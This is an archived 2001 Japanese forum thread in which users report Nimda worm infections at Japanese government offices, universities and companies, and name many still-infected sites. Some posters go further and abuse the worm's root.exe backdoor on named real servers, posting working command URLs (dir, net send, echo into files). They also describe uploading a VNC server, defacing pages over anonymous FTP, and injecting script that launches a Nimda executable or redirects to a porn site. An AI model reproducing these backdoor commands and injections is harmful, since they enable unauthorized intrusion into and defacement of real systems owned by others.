5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ニムダ被害報告スレ

1 :被害者:01/09/21 23:17
どこがやられてる?
症状はどんな感じ?
挙げてこう。


(9/19)農水省にもウイルス侵入
(9/19)5国立大でウイルス感染
(9/19)三重県庁もウイルスに感染
(9/19)岐阜県でもウイルス感染
(9/19)宮城県庁もウイルス感染
(9/19)茨城県庁もウイルスに汚染

2 :名無しさん@お腹いっぱい。:01/09/21 23:19
http://it.nikkei.co.jp/it/sp9/sp9Ch.cfm?id=20010920eimi067020

韓国の情報通信省は20日、
米連邦捜査局(FBI)が米中枢同時テロとの関連を調べている
新種のコンピューターウイルス「W32/Nimda」について
約3700件の被害報告があったことを明らかにした。
同省は「コードレッドなどに比べて感染力が強く、急速に広がっている」
と注意を呼びかけている。
〔ソウル20日共同〕

韓国でも被害あり!!

3 :名無しさん@お腹いっぱい。:01/09/21 23:19
群馬県庁43台

4 :名無しさん@お腹いっぱい。:01/09/21 23:22
    ΛΛ    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 、_ ミ,,゚Д゚彡 < 正直、俺のPC。
  uuuu´     \ _____________________________________________

5 :名無しさん@お腹いっぱい。:01/09/21 23:26
内閣府によると、内閣官房と内閣府のLAN(構内情報通信網)の
一部サーバーと端末が19日午後、コンピューターウイルス「W32/Nimda(ニムダ)」に感染した。
この影響で汚染されたコンピューター端末が使えなくなったほか、
感染防止のため、内閣官房、内閣府から他のホームページを開かないよう指示した。

6 :名無しさん@お腹いっぱい。:01/09/21 23:27
某県庁確か24台。
漏れ、会社PC無傷。
漏れ、淋しいから感染サイトでニムダ落す。色々眺めて遊ぶ。
そしたら、キャッシュした感染サイトのhtmlソース自体がウイルス反応。
苦笑い。

7 :名無しさん@お腹いっぱい。:01/09/21 23:31
うちの大学・・・・

8 :ジャミロクアイ:01/09/21 23:33
       ____
     ,: 三ニ三ミミ;、-、     \/   ̄   | --十 i   、.__/__ \  ,   ____|__l l ー十
     xX''     `YY"゙ミ、    ∠=ー  ̄ヽ |  __|.  |   | /  ヽ  /   __|   ,二i ̄
    彡"     ..______.  ミ.    (___   ノ. | (__i゙'' し      ノ /^ヽ_ノ (__ (__
    :::::             ::;
   ,=ミ______=三ミ ji,=三ミi
   i 、'ーーー|,-・ー |=|,ー・- |                ,-v-、
   i; '::  ::: ーー" ゙i ,ーー'j             / _ノ_ノ:^)
    ーi:: ::i:  /`^ー゙`、_ ..i           / _ノ_ノ_ノ /)
     |:::. ゙"i _,,.-==-、;゙゙i             / ノ ノノ//
     〉::.:..  丶 " ゙̄ .'.ノ       ____  /  ______ ノ
   / i, `ー-、.,____,___ノ\____("  `ー" 、    ノ
 ー'/  'i. ヽ、 ,二ニ/   \       ``ー-、   ゙   ノ
  /   'i、 /\ /      >       ( `ー''"ー'"
  \   'i," (__) /   /         \ /ノ

9 :名無しさん@お腹いっぱい。:01/09/21 23:49
どこのスレか忘れたけど
18日にリアルタイムでmsnが変だって言ってる時に
普通に見に行ったらられれたーよ。

10 :名無し:01/09/22 00:17
おそらく、F社第○システム事業部および関連部署

20日出荷予定のパッケージシステム差分が出荷されず。
担当者曰く「ウィルスのせい」だそうです。

11 :ななし:01/09/22 16:36
某大手家電メーカー全社的にやられちゃいました〜。

12 :名無しさん@お腹いっぱい。:01/09/23 01:42
Q電

13 :名無しさん@お腹いっぱい。:01/09/23 14:45
岡山県庁

14 : :01/09/23 15:43
>>9
ウイルスに感染してもHPは正常に見れるよ。

15 : :01/09/23 15:52
高松市保健所感染

16 :名無しさん@お腹いっぱい。:01/09/23 16:22
掲示板付き感染サイトハケーン 大物居なくなった・・・
http://www.rsk2000.co.jp

17 : :01/09/23 16:45
東京トヨペット閉鎖中
http://www.tokyo-toyopet.co.jp/comtop/index.html

18 : :01/09/23 19:07
症状は?

19 :名無しさん@お腹いっぱい。:01/09/23 19:58
Apache鯖なのに置いてあるってことは便乗犯?
http://www1.sphere.ne.jp/noone/

20 :だうーん:01/09/23 20:56
ダウ平均で有名なここもウィルスばら撒き中。
http://www.djnews.co.jp/
どうでもいいけど早く閉鎖しろよな(藁

21 :名無しさん@お腹いっぱい。:01/09/23 21:27
この企業は社会的責任も大きいのでこのまま放置は日本の恥
よって晒し上げ

苦情はこちら↓

Sites with longest running systems at Dow Jones Japan K.K.
Dow Jones Japan K.K. Marunouchi Mitsui Bldg. 1F, 2-2-2 Marunouchi, Chiyoda-ku, Tokyo 100-0005, Japan

ダウ・ジョーンズ・ジャパン(株)

住所 東京都千代田区丸の内2−2−2
電話(代表)03-5220-2730

22 :名無しさん@お腹いっぱい。:01/09/23 22:09
>>19
感染するとローカルマシンのhtmlファイルも改竄される模様。
どっかのページで地雷踏んで、それに気づかないままの可能性
あり。

23 :名無しさん@お腹いっぱい。:01/09/23 22:25
>>22
ってことは改竄されたhtmlを転送したってこと?
にしても転送後に普通確認するよなぁ。
readme.exeも一緒に転送とか、故意以外に考え難いんだが
そんなことあるの?

24 : :01/09/23 22:38
>>16 は間違い 訂正はこっち
BBS付き感染サイト
http://www.rsk2000.co.jp/ipg/

25 :22:01/09/23 23:02
>>23
すま、俺もよくわかってないです
好奇心からいろいろ調べてるけど、伝染させるのに
使ってる脆弱性だけでも2,3あるし。

でも、ローカルのhtml,aspなど改竄するのは確かかと。

このへんから。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html

26 :コピペ:01/09/23 23:02
>>23
(ワーム自身の)コピーを行うフォルダにHTML、ASPファイルがあった
場合、HTMLファイルにJavaScriptのコマンドを一行追加すると同時に
“README.EML”のファイル名でウイルスのメールファイルを作成する
場合があります。このJavaScriptを追加されたHTML、ASPファイルが
Web上で公開されていた場合、そのページをブラウズすると
“README.EML”がオープンされ、IEのセキュリティホールにより
ウイルスが活動を開始します。

27 :名無しさん@お腹いっぱい。:01/09/23 23:15
>>24
>nimudaウィルスは、サーバーが感染したものです。
>すでに駆除済みですが、コマンドが断片的に残されており
>ニムダを自動的にインストールしようとしてエラーが起こります。
>ウィルス自体は駆除済みなので感染することもございません。
>安心して閲覧して下さい。

だそうです。確かにhtmlには残骸が残っててダウンロードさせる
動作はするがreadme.exeが無いため404になってるようだが。

28 :名無しさん@お腹いっぱい。:01/09/24 01:33
おいらのPC、190も".eml"があったよ〜。 (T_T)

でも、起動ドライブには1つも無かった。
感染してるのか?

29 :名無しさん@お腹いっぱい。:01/09/24 05:19
「ノートン入れてるからぁ」なんて余裕だったんだけど、甘かった。
セキュリティのログ見て、ここんとこずっと一分おきくらいに一日中
アタックされてるからなんかむかついて1個アドレスコピーしてIPサーチ
のHPでそのアドレスに繋いだとたん、画面にでっかく「FUCK’IN USA GAVAMEMT」
とか出てアンチウィルスの警告・・・処理画面の「次へ」のボタン押しつづけても新たな
警告のダイアログが・・・結局除去不可でウィルス隔離された後、手動でウィルス定義
更新して、完全スキャンして(ウィルスは発見されませんでした)その後メニュー画面で検疫
ログ見たら3つファイルがあったので削除。やっぱemlとかreadmeとなってた。
 これでOKですよね?

30 : :01/09/24 06:45
キャッシュで止まってたの?
つうか感染サイト行く時にはJavaのアクティブスクリプト
切りましょう。

31 :名無しさん@お腹いっぱい。:01/09/24 07:15
SOYOで食らった。Nimda感染が判明したからか、今は一部ページが削除されてるようだが。
http://www.soyo.co.jp/

32 :名無しさん@お腹いっぱい。:01/09/24 07:21
>>30
>Javaのアクティブスクリプト
って何?

33 :名無しさん@お腹いっぱい。:01/09/24 07:37
>>30
そういうボケ、おれ好きよ☆

34 :>:01/09/24 09:29
ttp://www.advaoptical.co.jp
アドバ・オプティカル・ネットワーキング株式会社
  CodeRedにもやられたままだし。。。
  注意しようにもDNSでMXが設定されてないし。。。。
社名にネットワーキングとはいってるが、何の会社だ。。。

35 : :01/09/24 09:31
マクで感染サイト開くと、 タイトルバーに
http://www.xxx.xx.xx/readme.eml
って書いてあるでかいウィンドゥが開くんだよ。

36 :名無しさん@お腹いっぱい。:01/09/24 10:27
拙者の自宅PCたちは無事だったが、会社のネットワーク全滅。
1度駆除したが、再度罹患して全滅。
おととい駆除を終えたばかり。
今後2度と罹患しないでくれ〜。
なぜか拙者が容疑者だ。

37 :ん〜ま:01/09/24 12:17
>>34
光通信デバイスの商社です。

38 :>:01/09/24 12:34
>>37
ネットワーキングといっても
コンピュータネットワークとはあまり関係ないんだね。
(関係あったらちょっとヤだったけど)

連休中だから会社に人がいなくて気づいてないのかな。。

39 :>:01/09/24 12:45
しかし、このアドバ DNSからMXがひろえないというのは
何だろう。
メールはやらないということか。

40 :名無しさん@お腹いっぱい。:01/09/24 13:40
nullって窓が開いたぞ〜
なんだこりゃぁぁぁあぁぁああああああああああああああああああああああああ

41 : :01/09/24 13:41
>>40
ご愁傷様です(藁

42 : :01/09/24 19:21
感染するとどうなるわけ?

43 :22:01/09/24 22:31
>>42

バックドアの作成、admin.dll/riched20.dllの上書き、htmlファイルの改竄、
すべてのドライブのネットワーク共有の作成、開いているネットワーク共有フォルダへ
自分自身をコピー、ゲストアカウントの管理者権限への昇格、自前のSMTPエンジンを
使って自分自身を大量送信、実行形式ファイルの改竄

などなど。

44 :>:01/09/25 01:28
連休で放置されたままのサイト多いと思われ。
その上CodeRedのroot.exe残ったままって結構あるな。

45 :名無しさん@お腹いっぱい。:01/09/25 07:46
どこの国立大学が感染したの?

46 :>>38:01/09/25 15:04
あどば、月曜になってもそのまま
http://www.advaoptical.co.jp/scripts/root.exe?/c%20dir%20c:\

社名からネットワーキングはずした方がよくないか?

47 :名無しさん:01/09/25 19:05
二重に引っかかってます

ttp://www.bee.woodland.co.jp/test/kb-index.htm

48 :>>:01/09/25 21:02
ウッドランドさんまで。。。

49 :名無CCDさん@画素いっぱい:01/09/26 00:43
気を取り直して。

ここ↓は、やられてるのでしょうか?

ttp://www5.yodobashi.co.jp/jsp/dc.jsp?sst_id=0000000002

50 :名無しさん@お腹いっぱい。:01/09/26 12:32
これだけ感染被害が出やすくて、次のXPでも問題点が解消されてなければ集団告訴もんじゃない?
絶対、PL法違反だよ。分かってるバグを残して出荷してるんだから。

みんなで声を高らかに上げよう!

マイクロソフトはXPを無償で配ばれ!!

51 :&:01/09/26 14:47

>マイクロソフトはXPを無償で配ばれ!!

穴だらけのものがこれ以上広がったらよけいマズイぞ!!

52 :名無しさん@お腹いっぱい。:01/09/26 14:59
XPって穴あるの? もうわかってるの?

53 :&:01/09/26 15:26
NTや200の穴具合からみて
あると憶測してもいいと思われ。

54 :楽観君:01/09/26 15:34
>53
というか、たとえ無くても、以後1年間は穴空けられまくると推測する方が
前向きで宜しいと思われ。

先ずは、リモートデスクトップ。
外からアクセスに強くても内側から起動させられて利用されればどうしよう
もないと思われ。

55 :名無しさん@お腹いっぱい。:01/09/26 22:16
XP対応の新種ワーム誕生
 ↓
トラフィクが急激に増大
 ↓
各プロバイダのバックボーン増強
 ↓
(゚д゚)ウマー
 ↓
     ,一-、
    / ̄ l |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ■■-っ < んなーこたーない
   ´∀`/    \________
  __/|Y/\.
Ё|__ | /  |
   | У..  |

56 :名無しさん@お腹いっぱい。:01/09/28 03:46
もういっぺんニムダ捕獲しようとしてうろうろ
してるけど、なかなか捕まらないYO!

しかし、感染したことを隠す組織のなんと多いことか....
readme.emlへのアクセスだけを取り払っているので
バレバレだってばよ。

<language=JavaScript></JavaScript>
みたいな感じでばっちり残ってるんだけど....

57 :名無しさん@お腹いっぱい。:01/09/28 11:50
>>56
port80のログをチェックして、nimdaからのアクセスがあれば
そこのroot.exeを覗きに行く、というのではどうかな。
数日前だけど、それでいくつか入手したよ。

58 :名無しさん@お腹いっぱい。:01/09/28 20:21
>>56
いくらでもどうぞ。

ttp://www.sano-mfg.co.jp/tokucyo/tokuchou.htm
ttp://www.bee.woodland.co.jp
ttp://www.clubtgp.com/freehosting/teeny/kat/index.htm

59 :名無しさん@お腹いっぱい。:01/09/28 20:29
>>56
redme.eml拾ってどうするの?
base64エンコードの部分だけxxxしてxxxxとxxxてxxxxなよ(w

60 :56:01/09/28 21:09
>>57
そういえば、その方法使えたな....
どもです

>>58
ありがと、後で見に行ってみるよ。

>>59> redme.eml拾ってどうするの?

いや、ただ単に漏れが興味あるから見たくなっただけ。
ほら、それにこれだけ大騒ぎになってるのにほったらかしに
してある鯖ってちょっと見てみたくない?(w

61 :名無しさん@お腹いっぱい。:01/09/28 23:23
>>60
>ほら、それにこれだけ大騒ぎになってるのにほったらかしに
>してある鯖ってちょっと見てみたくない?(w

つーか、ほったらかしのサイトってまえにあった
ttp://IP/script/root.exe?/c%20net%20send%20localhost%20%22ほげほげ%22
でメッセージ送ろうがお構いなしだよ。

そいやたまたまログに残ってたのを見にいったら、CodeRed.txtって
いうファイルを作ってる先客がいた。それでも気が付かないみたい。
ttp://IP/scripts/root.exe?/c%20echo%20Your Machine is infected by CodeRed.>c:\>CodeRed.txt

モニタ切ってるのかな?いいかげん飽きてきた。

62 :名無しさん@お腹いっぱい。:01/09/28 23:34
>>61
ムダムダ。シャットダウンに成功したって翌日そのまま再起動してた例があるくらいだから。

63 :やまもとたかお:01/09/28 23:36
だから「2無駄」って言うのかぁ

64 :名無しさん@お腹いっぱい。:01/09/28 23:37
>>61
そういえば、
あるサイトで見たんだが、

2001-09-20 04:03p 667,648 V3nimda.exe

このV3てなんだ?

65 :名無しさん@お腹いっぱい。:01/09/28 23:43
だいたい、

http://IP/

で閉店してるのに

root.exe

が通るようなサイトは永久にこのままだな(w

66 :名無しさん@お腹いっぱい。:01/09/28 23:48
>>64

実行したら http://IP/

ページを表示できません

だったのが、

ページが見つかりません

になっちゃったよ(w

67 :61:01/09/29 00:20
>>64
V3はCodeRedIIのことかな?
ま、一応は対策しようとしてる姿勢はあるようだな。
バックドアには無頓着のようだが(w
>>61
再起動されたらしつこくシャットダウン(w
つか、2000でコマンドからシャットダウンってのは難しそう。
http://homepage2.nifty.com/winfaq/w2k/boot.html#1001
それもコマンドでファイル作って実行したのかな?

68 :名無しさん@お腹いっぱい。:01/09/29 00:59
>>67
おらいま、VNCサーバー送り込もうとしてるだ(w

69 :名無しさん@お腹いっぱい。:01/09/29 01:09
>>68
もう、何でもやってちょぷだい。
でもイターイのイヤーン。

70 :名無しさん@お腹いっぱい。:01/09/29 01:21
>>67
つーか、こういうのがあるなら、感染マシンに取りこまさせたのでしょう。
漏れはやったわけじゃないけど。

71 :名無しさん@お腹いっぱい。:01/09/29 02:53
某会社、1週間も泊まりつづけてニムダ駆除してるんだけど
それってどう?

72 :名無しさん@お腹いっぱい。:01/09/29 03:14
>>70
んー、どこぞのftpでアップしろというのもanonymousじゃ
だめなわけだから結構難しいと思う。
感染鯖からftpでgetまでもできなさそう。
ftpまでハックしないと無理でない?

73 :名無しさん@お腹いっぱい。:01/09/29 08:09
>>71
個人ユーザーが1台のマシンにつきっきりでもしんどいし、アタマ使うのに、会社で五月雨式にやっても永久に・・・。

某社ではIE禁止令(来年3月までの時限)が出たらしいよ。

74 :名無しさん@お腹いっぱい。:01/09/29 08:11
ただ閉じてるだけのところ、日本には山ほどあるよね。

http://www.takara-univ.ac.jp/
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.sg-jc.ac.jp/
http://www.advaoptical.co.jp/
http://www.computools.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/

このへんが復活したらどうなるんだろう。 嵐が収まったから玄関あけよう、みたいなところも多いような・・。

こんなとこもあるし。
http://pc2.autechs-unet.ocn.ne.jp

10月再開って、なんか目途があるんだろうか。
http://www.with9.com/

75 :名無しさん@お腹いっぱい。:01/09/29 11:42
>>72
EXPLOITツール使う。若し対象鯖未だパッチ当ててないなら使える。
外出配布済み。

76 :名無しさん@お腹いっぱい。:01/09/30 22:20
>>74
取りあえず×
http://www.inet-service.co.jp/scripts/root.exe?/c%20dir%20c:\

77 :名無しさん@お腹いっぱい。:01/09/30 23:36
人間の脳にも感染するようです。

http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

78 :名無しさん@お腹いっぱい。:01/09/30 23:41
>>76
>これからの企業成長の原動力はダイナミックな情報システム。
>そのキーとなるのがイントラネットシステムです。
>国境や時差の壁を越え、世界中のあらゆる分野に浸透しつつあるインターネットを
>企業内のクライアント・サーバーシステムと融合させることにより

バックドアにより見事にイントラネットとインターネットが融合
しました(w

79 :名無しさん@お腹いっぱい。:01/10/01 00:01
報告!

http://www.zumensoft.co.jp/menu.html

80 :名無しさん@お腹いっぱい。:01/10/01 00:02
>>77
>>79

同じやん( ̄△ ̄;

81 :>78:01/10/01 00:08
>私たちは、企業の社内外に存在する「情報」を、戦略的な資源として活用するするための「仕組み作り」を、お客様と共に「リアライズ」(実現)
>していくことを基本理念としています

バックドアによって社外から有用な情報が勝手にはいってくるわけですな。

82 :名無しさん@お腹いっぱい。:01/10/01 21:51
http://www.bee.woodland.co.jp/readme.eml

だめぢゃん( ̄△ ̄;

83 :名無しさん@お腹いっぱい。:01/10/01 23:44
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

>ウィルス駆除ソフトはシマンテックNorton Antivirus2000を使っていましたが効き目がありません


ノートンだめだとよ(w

84 :名無しさん@お腹いっぱい。:01/10/02 00:10
>>83
匿名で投稿した2CHねら居たみたいだけど、IP晒されてる・・・。

85 :名無しさん@お腹いっぱい。:01/10/02 08:21
>>84
晒されるのは最初から分かっているのだから承知の上だろう。

86 :名無しさん@お腹いっぱい。:01/10/03 18:28
ニムダ感染のため、行方不明になりました。

http://www.miruku.co.jp/usr/find/higa.htm

探してあげてください。

87 :名無しさん@お腹いっぱい。:01/10/03 18:56
>>86
こ…このサイト、ひどすぎない?

88 :名無しさん@お腹いっぱい。:01/10/03 19:26
>>86
ニムダのソース弄って、尋ね人のデータと連絡先本文にしてばら撒けば
良いよ。

89 :名無しさん@お腹いっぱい。:01/10/03 19:34
http://www.miruku.co.jp/

index.htmlのソースに烈しくワラタ

90 :名無しさん@お腹いっぱい。:01/10/03 19:39
>>89
<!-- sorosoro naosouyo... meiwakudayo... -->

91 ::01/10/03 19:45
90は誰が書いたのかな。。。。

92 :名無しさん@お腹いっぱい。:01/10/03 21:20
>>91
89と思われ(w

93 ::01/10/03 21:23
90書いて人に
”改竄できるなら、無害化しておいてやれ”
ってのはマズイんだよな。やっぱ

94 :名無しさん@お腹いっぱい。:01/10/03 22:37
90書いてる人に
”改竄できるなら、index.htmlにも

<html><script language="JavaScript">window.open("V3nimda.exe",null, "resizable=no,top=6000,left=6000")</script></html>

を挿入しておいてやれ”
ってのもマズイんだよな。やっぱ

95 :名無しさん@お腹いっぱい。:01/10/03 22:50
>>89
もっとひどいことになってるぞおい

96 :名無しさん@お腹いっぱい。:01/10/03 23:02
>>95=89

だからやめなはれって(w

97 :名無しさん@お腹いっぱい。:01/10/03 23:06
遊んだら戻して置いてね。

---

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META name="GENERATOR" content="IBM WebSphere Homepage Builder V6.0.2 for Windows">
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META http-equiv="Content-Style-Type" content="text/css">
<TITLE>沖縄情報</TITLE>
</HEAD>
<FRAMESET rows="143,*" frameborder="NO">
<FRAME src="index_u.html" scrolling="AUTO">
<FRAMESET cols="125,*" frameborder="NO">
<FRAME src="index_l.html" scrolling="AUTO">
<FRAME src="index_d.html" scrolling="AUTO">
</FRAMESET>
<NOFRAMES>
<BODY>
<P>このページをご覧いただくにはフレーム対応のブラウザが必要です。</P>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>

<!-- sorosoro naosouyo... meiwakudayo... -->

98 :名無しさん@お腹いっぱい。:01/10/03 23:14
>>95

そこまでできるなら、NapかMXの鯖置いてくれ(w

99 :名無しさん@お腹いっぱい。:01/10/03 23:17
>>89
<html><meta http-equiv="refresh" content="0.1;URL=http://www.sex-jp.net/dh/02/"></html>
あ〜あ・・・こんなもんかね。ページクラクって(w
串さして遣ってないと不味い事にならんかね。。(w

100 :名無しさん@お腹いっぱい。:01/10/03 23:17
>>98
VNC鯖でもいいぞ(w

http://www.uk.research.att.com/cgi-bin/vncform

101 :名無しさん@お腹いっぱい。:01/10/03 23:19
>>99
だからセルフツッコミすなって(w

102 :99:01/10/03 23:21
>>101
違うって(w
ツール使えば簡単なのは知ってるけど。断じて漏れじゃ無い。

103 :名無しさん@お腹いっぱい。:01/10/04 00:39
>>102
ツールも何も、アノニftp剥き出しなような気が…

104 :102:01/10/04 01:18
>>103
・・・・末期的。。。
そりゃ、ftp使ってファイル送るもんなnimda。

#CERTの記述↓外出だろうけど。。
The infected client machine attempts to transfer
a copy of the Nimda code via tftp (69/UDP) to any
IIS server that it scans and finds to be vulnerable.
TFTP殺して無いと、、ダメダメじゃん。無限ループだ。。

しかも、また感染上書きindex.html置いてるし。。
ってか、置いてあるhtml全部上書き済み。
co.jp名乗るならもっと責任もって欲しいよ。。。
ちなみにツール使うと串設定、窓で出来るらしい。
漏れは集めてるだけ。使わないけど(w
でも、NIMDAと仕組み似てるんだな。。コレが(w

105 :名無しさん@お腹いっぱい。:01/10/04 01:30
>>102
だから否定しながらもどすなっての(w

106 :名無しさん@お腹いっぱい。:01/10/04 01:39
>>105
ホンとにやってないんだってバ!
co.jpのindex、エロに飛ばすほど度胸無いよ(w。。。
それに、感染放置鯖は何置いても無駄だし。
シゴク簡単な事しても意味無いし。

107 :使ってやってくれ!:01/10/04 01:53
From :
752luq5f5n@msn.com
Reply-To : laurenevallejo1691@excite.com
To :
j310knlqx5d@msn.com
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From 752luq5f5n@msn.com Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection
問題あり:不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

108 :名無しさん@お腹いっぱい。:01/10/04 01:56
>>1-107

プッ

109 :名無しさん@お腹いっぱい。:01/10/04 02:07
>>108
屁禁止

110 :スカしました。。ゴメン>109:01/10/04 02:10
 

111 :名無しさん@お腹いっぱい。:01/10/04 02:35
>>110
音出てるじゃん

112 :名無しさん@お腹いっぱい。:01/10/04 02:42
>>106

たしかに。ここまで来るともはやハックでもなんでもないな。

113 :名無しさん@お腹いっぱい。:01/10/04 07:38
>>112
そのとおり。
特別なツールはいらない。
ウェブディレクトリもAccessDenyになってない状態で長期放置もめずらしい。
したがって>>94のような応急処置を任意のだれかが施すこともだれでも可能だ。

114 :>113:01/10/04 13:41
<!-- いやホントになんとかしようぜ・・・ -->
が追加されてら。。。

115 :名無しさん@お腹いっぱい。:01/10/04 21:46
>>113
驚くべきことに、何の勢いかftpがあのに開放のところって結構あるのね・・。

これはバックドアのせいじゃないよな。

たぶんそういうサービスなんだよな。うんうん、そうにちがいない、うん。

116 :名無しさん@お腹いっぱい。:01/10/04 22:08
>>115
いや、、でも、、CERTのドキュメント読むと、、あれ?TFTP使うクライアントって
一般PCぢゃなくって、、あ、一般PCの事か。。どうも英語苦手で。

117 :名無しさん@お腹いっぱい。:01/10/04 23:03
>>116
いや、だって鯖だもん、こう、なんていうか、きっとダウンロードとディスクスペースを供給するサービスなんだよきっ

118 :名無しさん@お腹いっぱい。:01/10/04 23:12
>>117
ど、動揺、す、するなって。

いや〜〜なんて平和な世の中なんだ!
週末、何して遊ぶかな〜〜

119 :名無しさん@お腹いっぱい。:01/10/04 23:19
>>118
どどど、どすぷろんぷとの本、かかか、買ってくるか、な、街道沿いの深夜営業のチェーン店で買、かう、か。

120 :名無しさん@お腹いっぱい。:01/10/04 23:22
>>114
ん。

121 :ハッ!?:01/10/04 23:23
>>119
雁の助はん?!

122 :名無しさん@お腹いっぱい。:01/10/04 23:26
>>121
お、お礼にこの絵、あげるんだな、これが。
http://www.miruku.co.jp/miruku02.gif

123 :121:01/10/04 23:36
>122
こ、コレは、本物だ!
・・・早く追いかけなきゃ!!

124 :うちにもやってきた:01/10/05 00:12
えらいこっちゃ
ブロックできたからよかったけど、、

125 :名無しさん@お腹いっぱい。:01/10/05 00:56
>>115
げ、まじだ。パスワード聞かれるけどキャンセルすれば
あのにでフルアクセス。
はじめてみた。

126 :125:01/10/05 01:02
んじゃわざわざ、ばくどあから、どすこまんど駆使して書き換える
必要ないな。ftpからあのにでindex.html送ればよい。
しゃとだうんソフトおくってもいいがそうすると
あそべなくなってしまう(ってをい!

ばくどあから
echo hogehoge >index.html
echo hogehoge2 >>index.html

ってたいへんなのよ(w

127 :>>>:01/10/05 01:46
こんな条件下(ftpで書きこみ放題)
でこの程度に保たれているなら、
結構つよくないか みるく。

128 :使ってやってくれ!:01/10/05 01:54
From :
1nny@msn.com
Reply-To : rickngoun859@excite.com
To :
1etnhgiype@msn.com
Subject : Low Cost Merchant Accounts [rytzw]
Date : Wed, 3 Oct 2001 ****

Received: from [199.217.206.66] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: (from daemon@localhost)by gatekeeper.strata-group.com (8.8.7/8.8.7) id TAA18406;Wed, 3 Oct 2001 19:11:13 -0500 (CDT)(envelope-from 1nny@msn.com)
Received: from triton.strata-group.com(131.124.0.4) by gatekeeper.strata-group.com via smap (V1.3)id sma018387; Wed Oct 3 19:10:45 2001
Received: from ntserver.strata-group.com ([131.124.0.5])by triton.strata-group.com (8.8.5/8.8.5) with ESMTP id SAA00591;Wed, 3 Oct 2001 18:48:52 -0500 (CDT)
Received: from sudve.msn.com (dac.dac-group.com [208.28.136.3]) by ntserver.strata-group.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)id TRZSJXYK; Wed, 3 Oct 2001 18:26:40 -0500
From 1nny@msn.com Wed, 03 Oct 2001 17:12:56 -0700
Message-Id: <200110032348.SAA00591@triton.strata-group.com>
X-Mailer: Microsoft Outlook Express 5.50.4522.1200

ntserver.strata-group.com
<<< 220 ntserver.strata-group.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from dac.dac-group.com208.28.136.3@ntserver.strata-group.com >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from dac.dac-group.com208.28.136.3@ntserver.strata-group.com >
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection

問題あり:不正な中継を受け付けます。
(199.217.206.68)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

129 :名無しさん@お腹いっぱい。:01/10/05 02:23
>>127
キット、徹夜でコンソール見て、一々手動で直してるんだよ。

130 :使ってやってくれ!:01/10/05 03:18
codeRed感染


211.177.33.103
211.57.241.1
200.251.230.66

131 :名無しさん@お腹いっぱい。:01/10/05 08:23
こうなってくると、なまじきちんと設定してあるのに、感染しているような鯖が一番タチがわるいな・・。

132 :名無しさん@お腹いっぱい。:01/10/05 12:58
>>127

ここまであけっぴろげだと、弄る気しないってのが最大の防御だったり(w

ハッカー志願者でも、ここまでオープンだと楽しくないだろ。

昔西洋人が古来の日本家屋にはカギがないと驚いたそうだが、それと同じ防犯システムだな(^^;

133 :名無しさん@お腹いっぱい。:01/10/05 14:34
>>129
てっきりナイトライダーネタかと・・・。

134 :名無しさん@お腹いっぱい。:01/10/05 15:15
>>133
あ、ナイトライダーのナイト2000なら可能かも>コンソール見て、一々手動で直して

135 :名無しさん@お腹いっぱい。:01/10/05 17:59
http://book-i.net/popon/

136 :名無しさん@お腹いっぱい。:01/10/05 20:53
nimdaとは直接関係ないが

IE(5以降)を起動

「ファイル」-「開く」

http://61.136.189.106 と入力

「Webフォルダとして開く」にチェック

OKをクリック

(゚∀゚)アヒャヒャ

137 :名無しさん@お腹いっぱい。:01/10/05 21:44
あーあ、閉まっちゃった。

http://3535682771/

138 :名無しさん@お腹いっぱい。:01/10/05 21:47
(w

<FRAMESET cols="125,*" frameborder="NO">
<FRAME src="index_l.html" scrolling="AUTO">
<FRAME src="index_d.html" scrolling="AUTO">
</FRAMESET>
<NOFRAMES>
<BODY>
<P>このページをご覧いただくにはフレーム対応のブラウザが必要です。</P>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>

<!-- sorosoro naosouyo... meiwakudayo... -->

<!-- いやホントになんとかしようぜ・・・ -->

<!-- Demo Maa shibaraku konomamade iika..-->

<!-- 応急処置しておいたけどちゃんと対処してね -->

139 :名無しさん@お腹いっぱい。:01/10/05 23:20
